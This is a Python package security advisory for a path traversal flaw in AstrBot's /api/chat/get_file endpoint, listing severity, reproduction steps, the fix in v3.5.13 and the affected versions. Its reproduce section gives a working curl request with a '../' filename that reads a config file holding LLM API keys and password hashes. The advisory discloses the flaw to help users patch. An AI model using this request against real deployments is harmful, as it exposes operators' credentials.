PYSEC-2026-1196

See a problem?
Import Source
https://github.com/pypa/advisory-database/blob/main/vulns/astrbot/PYSEC-2026-1196.yaml
JSON Data
https://api.osv.dev/v1/vulns/PYSEC-2026-1196
Aliases
Published
2026-07-07T16:02:53.742707Z
Modified
2026-07-07T17:46:22.631166274Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
Summary
AstrBot Has Path Traversal Vulnerability in /api/chat/get_file
Details

Impact

This vulnerability may lead to:

  • Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.

Reproduce

Follow these steps to set up a test environment for reproducing the vulnerability:

  1. Install dependencies and clone the repository:

    pip install uv
    git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
    uv run main.py
    
  2. Alternatively, deploy the program via pip:

    mkdir astrbot && cd astrbot
    uvx astrbot init
    uvx astrbot run
    
  3. In another terminal, run the following command to exploit the vulnerability:

    curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json
    

This request will read the cmd_config.json config file, leading to the leakage of sensitive data such as LLM API keys, usernames, and password hashes (MD5).

Patches

The vulnerability has been addressed in Pull Request #1676 and is included in versions >= v3.5.13. All users are strongly encouraged to upgrade to v3.5.13 or later.

Workarounds

Users can edit the cmd_config.json file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later as soon as possible to fully resolve this issue.

References

References

Affected packages

PyPI / astrbot

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.4.4
Fixed
3.5.13

Affected versions

3.*
3.4.39
3.5.6
3.5.7
3.5.8
3.5.9
3.5.10
3.5.11
3.5.12

Database specific

source
"https://github.com/pypa/advisory-database/blob/main/vulns/astrbot/PYSEC-2026-1196.yaml"